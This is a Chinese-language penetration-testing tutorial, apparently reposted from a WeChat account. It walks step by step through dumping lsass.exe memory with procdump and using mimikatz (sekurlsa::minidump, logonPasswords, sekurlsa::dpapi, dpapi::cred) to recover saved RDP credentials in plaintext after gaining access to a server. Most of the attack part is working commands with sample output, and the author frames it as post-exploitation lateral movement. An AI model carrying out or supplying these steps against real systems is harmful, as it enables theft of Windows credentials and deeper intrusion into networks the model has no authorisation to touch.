内网知识体系之远程凭据获取

当我们拿到服务器权限时，往往会更深层次的渗透，在建立据点的时候，往往会分析到底是横向还是纵向，在开始之前会进行一些信息收集，使用procdump+mimikatz可以一步到位的获取到远程链接凭证。 

在个人电脑使用mstsc进行远程链接时会输入所需账户密码，可能有些人觉得麻烦就会选择保存凭证信息，在下次链接时就不需要再次输入用户名密码，但是此操作会在本地保存一份凭证。如果有人进入到了该服务器，反之：就会产生一种连锁反应。

在windows桌面下可以使用 procdump+mimikatz 一步到位，具体流程

1.procdump 请使用管理员权限运行

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

先使用procdump读取lsass.exe进程里面的内容，lsass.exe时本地安全和远程登录策略

得到以下回显：

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[22:46:56] Dump 1 initiated: C:UserskkDesktopProcdumplsass.dmp
[22:46:56] Dump 1 writing: Estimated dump file size is 62 MB.
[22:46:56] Dump 1 complete: 62 MB written in 0.5 seconds
[22:46:57] Dump count reached.

会在当前目录下产生一个lsass.dmp文件。 

然后用mimikatz搞定即可

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

这里我用本机做的测试。先在cmd中查看Credentials目录下是否有保存凭证

dir /a %userprofile%AppDataLocalMicrosoftCredentials*

如果有列出文件，说明有保存的凭证，进入%userprofile%AppDataLocalMicrosoftCredentials文件夹将其下载下来

注意:如果cmd中有列出文件，但在文件中无法看到，请在查看选项里取消隐藏系统文件。

将刚刚下载出来的文件保存在固定位置：使用mimikatz读取

privilege::debug
dpapi::cred /in:C:Users99283Desktopmim100A35A6564D355D582583D428DD668A

将回显内容里面的guidMasterKey记录下来，等会要用  

guidMasterKey：{41d516ca-fe4c-4c2d-a639-f72638f58802}

先使用mimikatz绑定刚刚dump出来的lsass.dump

sekurlsa::minidump lsass.dmp

然后读取里面的内容

sekurlsa::dpapi

找到刚刚记录下来的guidMasterKey对应的guid

记录对应MasterKey

82c234e8fc1043fc18bf907bf68284c7098083436ed71ba075c6553ec6d78a503942cf4e5ce54ce97b1354b3db5ebb81d28a7c874a38933e9dfc16a48ae818a3

5.解密内容，获取远程凭证信息

上面获取到了对应的GuidMasterKey和对应的MaserKey后，我们就可以进行解密

dpapi::cred /in:远程凭证文件地址 /masterkey:记录下来的MasterKey

就可以得到相应的password，还是明文

原文始发于微信公众号（PwnPigPig）：内网知识体系之远程凭据获取